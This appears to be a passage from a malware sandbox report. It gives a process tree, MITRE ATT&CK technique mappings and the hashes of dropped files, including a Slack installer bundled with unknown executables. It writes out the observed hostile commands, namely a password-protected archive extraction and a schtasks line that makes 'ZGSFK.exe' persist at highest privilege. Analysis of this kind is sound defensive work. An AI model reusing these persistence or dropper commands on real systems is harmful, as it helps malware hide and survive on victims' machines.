    - Suspicious use of FindShellTrayWindow
    PID:4368
- - C:\Users\Admin\AppData\Roaming\newplugin\winrar.exe
    "C:\Users\Admin\AppData\Roaming\newplugin\winrar.exe" x -y -pjryj2023 C:\Users\Admin\AppData\Roaming\newplugin\03plugins*.* "3plugin*" C:\Users\Admin\AppData\Roaming\newplugin
    3⤵
    - Executes dropped EXE
    - Suspicious use of FindShellTrayWindow
    PID:3848
- - C:\Users\Admin\AppData\Roaming\newplugin\3plugin_20230609
    C:\Users\Admin\AppData\Roaming\newplugin\3plugin_20230609
    3⤵
    - Checks computer location settings
    - Executes dropped EXE
    PID:4136

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k WerSvcGroup
1⤵
- Executes dropped EXE
PID:2280
- C:\Windows\system32\werfault.exe
  werfault.exe /hc /shared Global\38d48ecfe6b442f5b24f5a2c9d306b57 /t 3884 /p 3848
  2⤵
  PID:2268
- C:\Windows\system32\WerFault.exe
  C:\Windows\system32\WerFault.exe -pss -s 556 -p 3620 -ip 3620
  2⤵
  PID:1444

C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe
"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca
1⤵
- Modifies registry class
- Suspicious use of SetWindowsHookEx
PID:3160

C:\Users\Admin\AppData\Roaming\TypeName\Current
C:\Users\Admin\AppData\Roaming\TypeName\Current
1⤵
- Checks computer location settings
- Suspicious use of SetThreadContext
- Executes dropped EXE
PID:4700
- C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe
  C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:3816

C:\ProgramData\filex64\ZGSFK.exe
C:\ProgramData\filex64\ZGSFK.exe
1⤵
- Checks computer location settings
- Executes dropped EXE
PID:1648
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc MINUTE /mo 5 /RL HIGHEST /tn "ZGSFK" /tr "C:\ProgramData\filex64\ZGSFK.exe"
  2⤵
  PID:2020
- - C:\Windows\system32\schtasks.exe
    schtasks /create /f /sc MINUTE /mo 5 /RL HIGHEST /tn "ZGSFK" /tr "C:\ProgramData\filex64\ZGSFK.exe"
    3⤵
    - Creates scheduled task(s)
    PID:2980

C:\Users\Admin\AppData\Roaming\TypeName\Current
C:\Users\Admin\AppData\Roaming\TypeName\Current
1⤵
- Checks computer location settings
- Executes dropped EXE
PID:1456

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Scheduled Task

T1053

Persistence

Registry Run Keys / Startup Folder

T1060

Scheduled Task

T1053

Privilege Escalation

Scheduled Task

T1053

Defense Evasion

Install Root Certificate

T1130

Modify Registry

T1112

Web Service

T1102

Credential Access

Credentials in Files

T1081

Discovery

Process Discovery

T1057

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Data from Local System

T1005

Command and Control

Web Service

T1102

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\ProgramData\filex64\ZGSFK.exe

Filesize
792.0MB

MD5
b1dcef69a9b3ec0121d4cbbaa1196940

SHA1
7cace076b1ebff9aed041ddcaea263862a1fdb13

SHA256
215b255c67418c7f412d45602bd054ba34b22d779e161448632dfc24c8a0feb4

SHA512
8a4852c980a5ad79f9d4f47217ffaa1e48e8c28dfd05f967456d97b26f8a739cba75e651e6a4508f4983fa147a5cf819afd3083e3c96cc2007431986fd609963

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\Update.exe.log

Filesize
1KB

MD5
6eb96c16eb677b6a8c1df381a0497a1a

SHA1
d4596baadc2d4bee89d57e1718ab30c0b7d563ec

SHA256
e96331392d474ca0fbc51036c7d55aa3a37aae6b074d50ebd106a277b0cb4097

SHA512
3d472d56ceb73a3df3f65eff6af088b3a81ab553153cbda925091500a6543cf83e84872f2bc81f218deddecd8f3c9868d784c2fe08ece95f915138becaecfb0b

Download Submit
C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\DeviceSearchCache\AppCache133313108730567617.txt

Filesize
76KB

MD5
4c11a9fa2f542b6c9d21aa7fc37f5077

SHA1
99758e47c668afac42d9a3ec10fdd2277fb8fcc9

SHA256
8dd1e254bd06f9c0434c1ea5b86b6c4adfcb32ed91c425d169a745ea7152d33c

SHA512
06e4f31fff069b2cec66c0034788b948e70bc3a6c66d64497f98dc632798cdb4aef04d774e5671129fb94df329a27e66be26a73fafb236bf84e6c550608f675e

Download Submit
C:\Users\Admin\AppData\Local\SquirrelTemp\RELEASES

Filesize
79B

MD5
5f85754370ef415f61b2f9b21ab4022a

SHA1
dbae97429f52dfb0a92e6235a1174b91670a1dcd

SHA256
57c1991670227592a1bed24877706b7ed6ee28efc1f8ec70ddb8527938a86293

SHA512
f1668fe191bc1de1ea818f211cde1180f93947eff31a805b8ca7adb1b138dbe307bd1497c9c00868768a334d13b1b25710e260441ed300af26200e02bdf65527

Download Submit
C:\Users\Admin\AppData\Local\SquirrelTemp\Update.exe

Filesize
1.5MB

MD5
108ca1dd522e8c43805a52625316de04

SHA1
4182ca223594aa6a9a1befcec31aaf61c77ca1fa

SHA256
d1a747f68d2d740b672430b380f0748feceab80e630a4002356de2f0ef233f00

SHA512
046a54d71b75d96d7b90d059c7a9bab7591ae93eb57ab6bd7e3b88617442d4f362e3d1f289e1c1f45888b59905d9117717da9f3059c8a3b06fb551ce14bd9ce8

Download Submit
C:\Users\Admin\AppData\Local\SquirrelTemp\Update.exe

Filesize
1.5MB

MD5
108ca1dd522e8c43805a52625316de04

SHA1
4182ca223594aa6a9a1befcec31aaf61c77ca1fa

SHA256
d1a747f68d2d740b672430b380f0748feceab80e630a4002356de2f0ef233f00

SHA512
046a54d71b75d96d7b90d059c7a9bab7591ae93eb57ab6bd7e3b88617442d4f362e3d1f289e1c1f45888b59905d9117717da9f3059c8a3b06fb551ce14bd9ce8

Download Submit
C:\Users\Admin\AppData\Local\SquirrelTemp\background.gif

Filesize
191KB

MD5
0b6b63cdaeae40f461aadfdef1d526bc

SHA1
b7cccd3328769552e9e8e0860ba933e9f6eb562f

SHA256
a23577728f09e8f4b24d7b03d2cb3611428d6acd2efb72db28289c7901e42fd8

SHA512
a07b77ad039762f5235348189767955a1ae5c37ba6a9697161855afab966d3e75e73337ae0853499a09b2bef74a5d8cfc00cf2525e165cc77ee82497bc6bb223

Download Submit
C:\Users\Admin\AppData\Local\SquirrelTemp\slack-4.32.122-full.nupkg

Filesize
109.3MB

MD5
aad01b0ab5785397206a9b1087dca556

SHA1
291a2f0d5a1c0721056d38155a1e5d79f255a812

SHA256
fc0412e3e8d4fabc7f3c67f9b5706fe7d34ee8552488f540967923c854505a64

SHA512
5311d193d16fa00be385783750ba2c4d60f4dbaa0912cf0810851e15333df185353f50aca8d723fdc96f914caba46feac4c1f95acd95a3386f9423b9571b7381

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_4vfr0gth.ntf.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Local\slack\Update.exe

Filesize
1.5MB

MD5
108ca1dd522e8c43805a52625316de04

SHA1
4182ca223594aa6a9a1befcec31aaf61c77ca1fa

SHA256
d1a747f68d2d740b672430b380f0748feceab80e630a4002356de2f0ef233f00

SHA512
046a54d71b75d96d7b90d059c7a9bab7591ae93eb57ab6bd7e3b88617442d4f362e3d1f289e1c1f45888b59905d9117717da9f3059c8a3b06fb551ce14bd9ce8

Download Submit
C:\Users\Admin\AppData\Local\slack\app-4.32.122\D3DCompiler_47.dll

Filesize
4.7MB

MD5
2191e768cc2e19009dad20dc999135a3

SHA1
f49a46ba0e954e657aaed1c9019a53d194272b6a

SHA256
7353f25dc5cf84d09894e3e0461cef0e56799adbc617fce37620ca67240b547d

SHA512
5adcb00162f284c16ec78016d301fc11559dd0a781ffbeff822db22efbed168b11d7e5586ea82388e9503b0c7d3740cf2a08e243877f5319202491c8a641c970

Download Submit
C:\Users\Admin\AppData\Local\slack\app-4.32.122\Squirrel.exe

Filesize
1.5MB

MD5
43715fc94ef95ad33ec16484342c0148

SHA1
8caeaf946e85bcc05fcf63e2f1054e4e23671cee

SHA256
910042aa9bcdc62227ea2bd731a0d15c25566f26c92f649049c1d9c7fc15179e

SHA512
bec557cb86d4a0562603b81a29e0f6ae9661cb8dd2f9bb062f5f8298260cdb5d52736bcb06479e4ab7a51dbd3a5b17b9746b2012cd2eee97882345e2b73897c1

Download Submit
C:\Users\Admin\AppData\Local\slack\app-4.32.122\chrome_100_percent.pak

Filesize
124KB

MD5
acd0fa0a90b43cd1c87a55a991b4fac3

SHA1
17b84e8d24da12501105b87452f86bfa5f9b1b3c

SHA256
ccbca246b9a93fa8d4f01a01345e7537511c590e4a8efd5777b1596d10923b4b

SHA512
3e4c4f31c6c7950d5b886f6a8768077331a8f880d70b905cf7f35f74be204c63200ff4a88fa236abccc72ec0fc102c14f50dd277a30f814f35adfe5a7ae3b774

Download Submit
C:\Users\Admin\AppData\Local\slack\app-4.32.122\chrome_200_percent.pak

Filesize
173KB

MD5
4610337e3332b7e65b73a6ea738b47df

SHA1
8d824c9cf0a84ab902e8069a4de9bf6c1a9aaf3b

SHA256
c91abf556e55c29d1ea9f560bb17cc3489cb67a5d0c7a22b58485f5f2fbcf25c

SHA512
039b50284d28dcd447e0a486a099fa99914d29b543093cccda77bbefdd61f7b7f05bb84b2708ae128c5f2d0c0ab19046d08796d1b5a1cff395a0689ab25ccb51

Download Submit
C:\Users\Admin\AppData\Local\slack\app-4.32.122\d3dcompiler_47.dll

Filesize
4.7MB

MD5
2191e768cc2e19009dad20dc999135a3

SHA1
f49a46ba0e954e657aaed1c9019a53d194272b6a

SHA256
7353f25dc5cf84d09894e3e0461cef0e56799adbc617fce37620ca67240b547d

SHA512
5adcb00162f284c16ec78016d301fc11559dd0a781ffbeff822db22efbed168b11d7e5586ea82388e9503b0c7d3740cf2a08e243877f5319202491c8a641c970

Download Submit
C:\Users\Admin\AppData\Local\slack\app-4.32.122\ffmpeg.dll

Filesize
2.8MB

MD5
667acfb13bd054da2268b2b75717e431

SHA1
6ec7668402863afef51f75ac3b1b7db212a003bb

SHA256
ebfd56870737e928de26c61f44319f3a3e3dacc41a5f8347138efd108d23cc59

SHA512
1dcc2abde50b9ab8f9152acc067f21cb3407619bcb6730d6e61c93e832edc51c3a79054c6ec11a439b87186559457b5721190ef2b62a6b5059650624f8953356

Download Submit
C:\Users\Admin\AppData\Local\slack\app-4.32.122\ffmpeg.dll

Filesize
2.8MB

MD5
667acfb13bd054da2268b2b75717e431

SHA1
6ec7668402863afef51f75ac3b1b7db212a003bb

SHA256
ebfd56870737e928de26c61f44319f3a3e3dacc41a5f8347138efd108d23cc59

SHA512
1dcc2abde50b9ab8f9152acc067f21cb3407619bcb6730d6e61c93e832edc51c3a79054c6ec11a439b87186559457b5721190ef2b62a6b5059650624f8953356

Download Submit
C:\Users\Admin\AppData\Local\slack\app-4.32.122\ffmpeg.dll

Filesize
2.8MB

MD5
667acfb13bd054da2268b2b75717e431

SHA1
6ec7668402863afef51f75ac3b1b7db212a003bb

SHA256
ebfd56870737e928de26c61f44319f3a3e3dacc41a5f8347138efd108d23cc59

SHA512
1dcc2abde50b9ab8f9152acc067f21cb3407619bcb6730d6e61c93e832edc51c3a79054c6ec11a439b87186559457b5721190ef2b62a6b5059650624f8953356

Download Submit
C:\Users\Admin\AppData\Local\slack\app-4.32.122\ffmpeg.dll

Filesize
2.8MB

MD5
667acfb13bd054da2268b2b75717e431

SHA1
6ec7668402863afef51f75ac3b1b7db212a003bb

SHA256
ebfd56870737e928de26c61f44319f3a3e3dacc41a5f8347138efd108d23cc59

SHA512
1dcc2abde50b9ab8f9152acc067f21cb3407619bcb6730d6e61c93e832edc51c3a79054c6ec11a439b87186559457b5721190ef2b62a6b5059650624f8953356

Download Submit
C:\Users\Admin\AppData\Local\slack\app-4.32.122\ffmpeg.dll

Filesize
2.8MB

MD5
667acfb13bd054da2268b2b75717e431

SHA1
6ec7668402863afef51f75ac3b1b7db212a003bb

SHA256
ebfd56870737e928de26c61f44319f3a3e3dacc41a5f8347138efd108d23cc59

SHA512
1dcc2abde50b9ab8f9152acc067f21cb3407619bcb6730d6e61c93e832edc51c3a79054c6ec11a439b87186559457b5721190ef2b62a6b5059650624f8953356

Download Submit
C:\Users\Admin\AppData\Local\slack\app-4.32.122\ffmpeg.dll

Filesize
2.8MB

MD5
667acfb13bd054da2268b2b75717e431

SHA1
6ec7668402863afef51f75ac3b1b7db212a003bb

SHA256
ebfd56870737e928de26c61f44319f3a3e3dacc41a5f8347138efd108d23cc59

SHA512
1dcc2abde50b9ab8f9152acc067f21cb3407619bcb6730d6e61c93e832edc51c3a79054c6ec11a439b87186559457b5721190ef2b62a6b5059650624f8953356

Download Submit
C:\Users\Admin\AppData\Local\slack\app-4.32.122\icudtl.dat

Filesize
10.1MB

MD5
d89ce8c00659d8e5d408c696ee087ce3

SHA1
49fc8109960be3bb32c06c3d1256cb66dded19a8

SHA256
9dfbe0dad5c7021cfe8df7f52458c422cbc5be9e16ff33ec90665bb1e3f182de

SHA512
db097ce3eb9e132d0444df79b167a7dcb2df31effbbd3df72da3d24ae2230cc5213c6df5e575985a9918fbd0a6576e335b6ebc12b6258bc93fa205399de64c37

Download Submit
C:\Users\Admin\AppData\Local\slack\app-4.32.122\libEGL.dll

Filesize
479KB

MD5
de39e509e1cb3dc2240b05715fa61447

SHA1
ea6340dd399b3cde8801accf2c5a97258844d245

SHA256
0d4de65f46c9a2081ab898a7f39f48d4215d881e22b5b57cf6fc1d23248707d4

SHA512
fbf8dd8b1b60062bde4dce1111b113d3395a5dfc067b338bc26a5f4273895d9bf1161a389ad2732fd1a1bf739f0e27530fb950bb54de22c87418003b6182a139

Download Submit
C:\Users\Admin\AppData\Local\slack\app-4.32.122\libGLESv2.dll

Filesize
7.3MB

MD5
b6bb7c1966cfad52ca2dbdc96439a513

SHA1
683b64ebf7eb6ca213489061312d66312c514fb0

SHA256
2ffc6d3777febba55f1c209b4ef9580a0ba5e331a785abae77c6beec5bc75370

SHA512
6b9f39a3f91652413904f7cb00123b1c554dc903e10d8c840724cfa0de4c8d9a37896894d7d7b89c2f272bcc2d43754137aa177c3434d5c9f7ec9d312576dfd4

Download Submit
C:\Users\Admin\AppData\Local\slack\app-4.32.122\libegl.dll

Filesize
479KB

MD5
de39e509e1cb3dc2240b05715fa61447

SHA1
ea6340dd399b3cde8801accf2c5a97258844d245

SHA256
0d4de65f46c9a2081ab898a7f39f48d4215d881e22b5b57cf6fc1d23248707d4

SHA512
fbf8dd8b1b60062bde4dce1111b113d3395a5dfc067b338bc26a5f4273895d9bf1161a389ad2732fd1a1bf739f0e27530fb950bb54de22c87418003b6182a139

Download Submit
C:\Users\Admin\AppData\Local\slack\app-4.32.122\libglesv2.dll

Filesize
7.3MB

MD5
b6bb7c1966cfad52ca2dbdc96439a513

SHA1
683b64ebf7eb6ca213489061312d66312c514fb0

SHA256
2ffc6d3777febba55f1c209b4ef9580a0ba5e331a785abae77c6beec5bc75370

SHA512
6b9f39a3f91652413904f7cb00123b1c554dc903e10d8c840724cfa0de4c8d9a37896894d7d7b89c2f272bcc2d43754137aa177c3434d5c9f7ec9d312576dfd4

Download Submit
C:\Users\Admin\AppData\Local\slack\app-4.32.122\locales\en-US.pak

Filesize
338KB

MD5
5e3813e616a101e4a169b05f40879a62

SHA1
615e4d94f69625dda81dfaec7f14e9ee320a2884

SHA256
4d207c5c202c19c4daca3fddb2ae4f747f943a8faf86a947eef580e2f2aee687

SHA512
764a271a9cfb674cce41ee7aed0ad75f640ce869efd3c865d1b2d046c9638f4e8d9863a386eba098f5dcedd20ea98bad8bca158b68eb4bdd606d683f31227594

Download Submit
C:\Users\Admin\AppData\Local\slack\app-4.32.122\resources.pak

Filesize
5.0MB

MD5
c2b9f8256a070f23a2bac3457198657b

SHA1
8a6c14bfe8149476baf407e3695a78863aa35fd9

SHA256
b5ab9cbb8b4f5fb9a3b2f15989a8522d3985c2b4260b1ace9b4edb5173f10deb

SHA512
37bf0e2f1b2bc700519ac7b4fa023611f88a8338d9b303988e1ba37345c1f2199750e60a9cc1e8b3f34c37b78ca5a9ca1f02086755d6fe3d6c5aafeae449c66e

Download Submit
C:\Users\Admin\AppData\Local\slack\app-4.32.122\resources\VisualElementsManifest.xml

Filesize
314B

MD5
d1b2fb317f2f8eaf3a07a79061acf890

SHA1
693495e7797924e9ad50fce0a09b46d63c6a4ece

SHA256
51f5127ee82e46fabb3a732b9a24e5b0707be789739ee189e13d9e412d88608e

SHA512
0a6c810f2a6ae39a15a01826b82cff16505ba614ad968b385e9785b81e55a886e6ba90e7f5f228ebafa6a477b69bcc680eb210091d9804111dcbf7a2f5082a99

Download Submit
C:\Users\Admin\AppData\Local\slack\app-4.32.122\resources\app.asar

Filesize
19.0MB

MD5
7189a1576e986aaecaa1300808d5d95a

SHA1
6268196a1b94b3465a8e8c813e8907d888ef28a2

SHA256
bf2be37cc7088fe58661cd160c8ea54c6490c925bfc2af2744ba0f7bd08561eb

SHA512
bbf50b20a7d08ea8ed38617d45f00acbd1f61172c2557efae164036a7f0a770264d7682f28b34c1d90765a5f64ccfbe5afd87f6aa148e674f1c7d7bf93e6a284

Download Submit
C:\Users\Admin\AppData\Local\slack\app-4.32.122\resources\app.asar.unpacked\node_modules\electron-native-auth\build\Release\electron_native_auth.node

Filesize
122KB

MD5
ca43f4475a5d0a8c157a135b2f708be7

SHA1
0a0333ed70fed8e8f4deb5aa41d8fdf388e6b399

SHA256
ea725d736aa8f6ac8cc3f9a6d1c1e0d4172c556e151f0ac1216221c0d7e59e5b

SHA512
336cbb72abb22711ca1e874debc94218aee602991ca66927f6ed705b5191bb30e4de639f663c15626b103b2fb75b801838f96bb9974b2a14d8c3af0431dc1e7b

Download Submit
C:\Users\Admin\AppData\Local\slack\app-4.32.122\resources\app.asar.unpacked\node_modules\electron-native-auth\build\Release\electron_native_auth.node

Filesize
122KB

MD5
ca43f4475a5d0a8c157a135b2f708be7

SHA1
0a0333ed70fed8e8f4deb5aa41d8fdf388e6b399

SHA256
ea725d736aa8f6ac8cc3f9a6d1c1e0d4172c556e151f0ac1216221c0d7e59e5b

SHA512
336cbb72abb22711ca1e874debc94218aee602991ca66927f6ed705b5191bb30e4de639f663c15626b103b2fb75b801838f96bb9974b2a14d8c3af0431dc1e7b

Download Submit
C:\Users\Admin\AppData\Local\slack\app-4.32.122\resources\app.asar.unpacked\node_modules\electron-native-auth\build\Release\electron_native_auth.node

Filesize
122KB

MD5
ca43f4475a5d0a8c157a135b2f708be7

SHA1
0a0333ed70fed8e8f4deb5aa41d8fdf388e6b399

SHA256
ea725d736aa8f6ac8cc3f9a6d1c1e0d4172c556e151f0ac1216221c0d7e59e5b

SHA512
336cbb72abb22711ca1e874debc94218aee602991ca66927f6ed705b5191bb30e4de639f663c15626b103b2fb75b801838f96bb9974b2a14d8c3af0431dc1e7b

Download Submit
C:\Users\Admin\AppData\Local\slack\app-4.32.122\resources\app.asar.unpacked\node_modules\file-handler-info\build\Release\file_handler_info.node

Filesize
118KB

MD5
7c9ea2a43cb0380d1f623f559e191914

SHA1
06ac4d823cb219041a8a735e43713e94f1988b88

SHA256
8c621a5b410fb15f2335de246a717cdd02cd5127515ac3453283f5d322eb7bad

SHA512
39425ff84bcad9dab21ca7ea8f2a11448dc594a48d56dc721ead74d6bf6443285722b11d2335af9d68090c98b05ec6702223b82147e7919117727045232199ef

Download Submit
C:\Users\Admin\AppData\Local\slack\app-4.32.122\resources\app.asar.unpacked\node_modules\file-handler-info\build\Release\file_handler_info.node

Filesize
118KB

MD5
7c9ea2a43cb0380d1f623f559e191914

SHA1
06ac4d823cb219041a8a735e43713e94f1988b88

SHA256
8c621a5b410fb15f2335de246a717cdd02cd5127515ac3453283f5d322eb7bad

SHA512
39425ff84bcad9dab21ca7ea8f2a11448dc594a48d56dc721ead74d6bf6443285722b11d2335af9d68090c98b05ec6702223b82147e7919117727045232199ef

Download Submit
C:\Users\Admin\AppData\Local\slack\app-4.32.122\resources\app.asar.unpacked\node_modules\registry-js\build\Release\registry.node

Filesize
623KB

MD5
3f54ec3cb92274e2e8a7afcb5650c1f0

SHA1
27e64753955377b751b77a1ec5084d36c601bd62

SHA256
2c6cb9af21b9930ca5c307f1671f73f475c2262a2648262e5b24fdb9a43cc75c

SHA512
ee6fa02d6c01a34ebe8ab275901308aea45ae8644c2205c2b24165567c461a53b94e411df70aef634bba939c07da39385a8bc8e84531f0e6ed517c271306b5df

Download Submit
C:\Users\Admin\AppData\Local\slack\app-4.32.122\resources\app.asar.unpacked\node_modules\registry-js\build\Release\registry.node

Filesize
623KB

MD5
3f54ec3cb92274e2e8a7afcb5650c1f0

SHA1
27e64753955377b751b77a1ec5084d36c601bd62

SHA256
2c6cb9af21b9930ca5c307f1671f73f475c2262a2648262e5b24fdb9a43cc75c

SHA512
ee6fa02d6c01a34ebe8ab275901308aea45ae8644c2205c2b24165567c461a53b94e411df70aef634bba939c07da39385a8bc8e84531f0e6ed517c271306b5df

Download Submit
C:\Users\Admin\AppData\Local\slack\app-4.32.122\resources\app.asar.unpacked\node_modules\registry-js\build\Release\registry.node

Filesize
623KB

MD5
3f54ec3cb92274e2e8a7afcb5650c1f0

SHA1
27e64753955377b751b77a1ec5084d36c601bd62

SHA256
2c6cb9af21b9930ca5c307f1671f73f475c2262a2648262e5b24fdb9a43cc75c

SHA512
ee6fa02d6c01a34ebe8ab275901308aea45ae8644c2205c2b24165567c461a53b94e411df70aef634bba939c07da39385a8bc8e84531f0e6ed517c271306b5df

Download Submit
C:\Users\Admin\AppData\Local\slack\app-4.32.122\resources\slack.VisualElementsManifest.xml

Filesize
407B

MD5
64e933897ecea5537bcc5acabd16fec0

SHA1
6fac862cbf5a2b7e8e9b6356ea3b75d420f5f527

SHA256
c29a25b7452330fe4e4b85beaabc229ae788608f56abb6c831a664ca868349e5

SHA512
ec04604a9ec1462f7c3a01dcafcbad89278480394deb5ba418617fbb086a22753845ad165c7f8468512ec9e515468b4a223715c443f19f55e9a0e6550aade1b1

Download Submit
C:\Users\Admin\AppData\Local\slack\app-4.32.122\slack.exe

Filesize
154.6MB

MD5
6a2da8a78a74f54e5f2eb09dfb58ea15

SHA1
639c39d65d776fbb7f1edeab291606d8e5eaabec

SHA256
55bd03882f4925fb4f99553e27fb8198c5a20e49780639fe788dc12bd1cca88f

SHA512
a8cb2fb3609ecec58f60350f6d1b11f3060b2f9d0781f9dc4d23cc155efcec9eaceca2f16c9acba61591af65fe40486338bf96bfadab13cc21dbec3f4a130f97

Download Submit
C:\Users\Admin\AppData\Local\slack\app-4.32.122\slack.exe

Filesize
154.6MB

MD5
6a2da8a78a74f54e5f2eb09dfb58ea15

SHA1
639c39d65d776fbb7f1edeab291606d8e5eaabec

SHA256
55bd03882f4925fb4f99553e27fb8198c5a20e49780639fe788dc12bd1cca88f

SHA512
a8cb2fb3609ecec58f60350f6d1b11f3060b2f9d0781f9dc4d23cc155efcec9eaceca2f16c9acba61591af65fe40486338bf96bfadab13cc21dbec3f4a130f97

Download Submit
C:\Users\Admin\AppData\Local\slack\app-4.32.122\slack.exe

Filesize
154.6MB

MD5
6a2da8a78a74f54e5f2eb09dfb58ea15

SHA1
639c39d65d776fbb7f1edeab291606d8e5eaabec

SHA256
55bd03882f4925fb4f99553e27fb8198c5a20e49780639fe788dc12bd1cca88f

SHA512
a8cb2fb3609ecec58f60350f6d1b11f3060b2f9d0781f9dc4d23cc155efcec9eaceca2f16c9acba61591af65fe40486338bf96bfadab13cc21dbec3f4a130f97

Download Submit
C:\Users\Admin\AppData\Local\slack\app-4.32.122\slack.exe

Filesize
154.6MB

MD5
6a2da8a78a74f54e5f2eb09dfb58ea15

SHA1
639c39d65d776fbb7f1edeab291606d8e5eaabec

SHA256
55bd03882f4925fb4f99553e27fb8198c5a20e49780639fe788dc12bd1cca88f

SHA512
a8cb2fb3609ecec58f60350f6d1b11f3060b2f9d0781f9dc4d23cc155efcec9eaceca2f16c9acba61591af65fe40486338bf96bfadab13cc21dbec3f4a130f97

Download Submit
C:\Users\Admin\AppData\Local\slack\app-4.32.122\slack.exe

Filesize
154.6MB

MD5
6a2da8a78a74f54e5f2eb09dfb58ea15

SHA1
639c39d65d776fbb7f1edeab291606d8e5eaabec

SHA256
55bd03882f4925fb4f99553e27fb8198c5a20e49780639fe788dc12bd1cca88f

SHA512
a8cb2fb3609ecec58f60350f6d1b11f3060b2f9d0781f9dc4d23cc155efcec9eaceca2f16c9acba61591af65fe40486338bf96bfadab13cc21dbec3f4a130f97

Download Submit
C:\Users\Admin\AppData\Local\slack\app-4.32.122\slack.exe

Filesize
154.6MB

MD5
6a2da8a78a74f54e5f2eb09dfb58ea15

SHA1
639c39d65d776fbb7f1edeab291606d8e5eaabec

SHA256
55bd03882f4925fb4f99553e27fb8198c5a20e49780639fe788dc12bd1cca88f

SHA512
a8cb2fb3609ecec58f60350f6d1b11f3060b2f9d0781f9dc4d23cc155efcec9eaceca2f16c9acba61591af65fe40486338bf96bfadab13cc21dbec3f4a130f97

Download Submit
C:\Users\Admin\AppData\Local\slack\app-4.32.122\slack.exe

Filesize
154.6MB

MD5
6a2da8a78a74f54e5f2eb09dfb58ea15

SHA1
639c39d65d776fbb7f1edeab291606d8e5eaabec

SHA256
55bd03882f4925fb4f99553e27fb8198c5a20e49780639fe788dc12bd1cca88f

SHA512
a8cb2fb3609ecec58f60350f6d1b11f3060b2f9d0781f9dc4d23cc155efcec9eaceca2f16c9acba61591af65fe40486338bf96bfadab13cc21dbec3f4a130f97

Download Submit
C:\Users\Admin\AppData\Local\slack\app-4.32.122\slack.exe

Filesize
154.6MB

MD5
6a2da8a78a74f54e5f2eb09dfb58ea15

SHA1
639c39d65d776fbb7f1edeab291606d8e5eaabec

SHA256
55bd03882f4925fb4f99553e27fb8198c5a20e49780639fe788dc12bd1cca88f

SHA512
a8cb2fb3609ecec58f60350f6d1b11f3060b2f9d0781f9dc4d23cc155efcec9eaceca2f16c9acba61591af65fe40486338bf96bfadab13cc21dbec3f4a130f97

Download Submit
C:\Users\Admin\AppData\Local\slack\app-4.32.122\squirrel.exe

Filesize
1.5MB

MD5
43715fc94ef95ad33ec16484342c0148

SHA1
8caeaf946e85bcc05fcf63e2f1054e4e23671cee

SHA256
910042aa9bcdc62227ea2bd731a0d15c25566f26c92f649049c1d9c7fc15179e

SHA512
bec557cb86d4a0562603b81a29e0f6ae9661cb8dd2f9bb062f5f8298260cdb5d52736bcb06479e4ab7a51dbd3a5b17b9746b2012cd2eee97882345e2b73897c1

Download Submit
C:\Users\Admin\AppData\Local\slack\app-4.32.122\squirrel.exe

Filesize
1.5MB

MD5
43715fc94ef95ad33ec16484342c0148

SHA1
8caeaf946e85bcc05fcf63e2f1054e4e23671cee

SHA256
910042aa9bcdc62227ea2bd731a0d15c25566f26c92f649049c1d9c7fc15179e

SHA512
bec557cb86d4a0562603b81a29e0f6ae9661cb8dd2f9bb062f5f8298260cdb5d52736bcb06479e4ab7a51dbd3a5b17b9746b2012cd2eee97882345e2b73897c1

Download Submit
C:\Users\Admin\AppData\Local\slack\app-4.32.122\v8_context_snapshot.bin

Filesize
574KB

MD5
4cd37ea771ea4fe2f3ad46217cc02206

SHA1
31680e26869b007e62550e96dbf846b3980d5b2b

SHA256
95f7b8664306da8d0073a795e86590ed6fdaede5f489132e56c8779f53cf1ed5

SHA512
e1369734cbe17aaf6dd3ceefb57f056c5a9346d2887a7d3ee7ed177386d7f5e624407869d53902b56ab350e4ded5612c3b0f52c2dd3efa307e9947701068a2a0

Download Submit
C:\Users\Admin\AppData\Local\slack\app-4.32.122\vulkan-1.dll

Filesize
916KB

MD5
e7d99fb2b82fd6399a3a324541b849cc

SHA1
543b1ee05ce30195bbd4ef2239a9cf847db165f7

SHA256
904617651aca62f13fb5500501a386a16a9ae5310847d68abec3d87e6f9fd00f

SHA512
c0f3f3b00ccfef1d08c11df6a10cdad2ca732347427fe05329b34f58cc080d183628699388c9e8bd77363023adc819d643f77e373a5a8a516b46c0a9e94bf676

Download Submit
C:\Users\Admin\AppData\Local\slack\app-4.32.122\vulkan-1.dll

Filesize
916KB

MD5
e7d99fb2b82fd6399a3a324541b849cc

SHA1
543b1ee05ce30195bbd4ef2239a9cf847db165f7

SHA256
904617651aca62f13fb5500501a386a16a9ae5310847d68abec3d87e6f9fd00f

SHA512
c0f3f3b00ccfef1d08c11df6a10cdad2ca732347427fe05329b34f58cc080d183628699388c9e8bd77363023adc819d643f77e373a5a8a516b46c0a9e94bf676

Download Submit
C:\Users\Admin\AppData\Local\slack\packages\RELEASES

Filesize
79B

MD5
5f85754370ef415f61b2f9b21ab4022a

SHA1
dbae97429f52dfb0a92e6235a1174b91670a1dcd

SHA256
57c1991670227592a1bed24877706b7ed6ee28efc1f8ec70ddb8527938a86293

SHA512
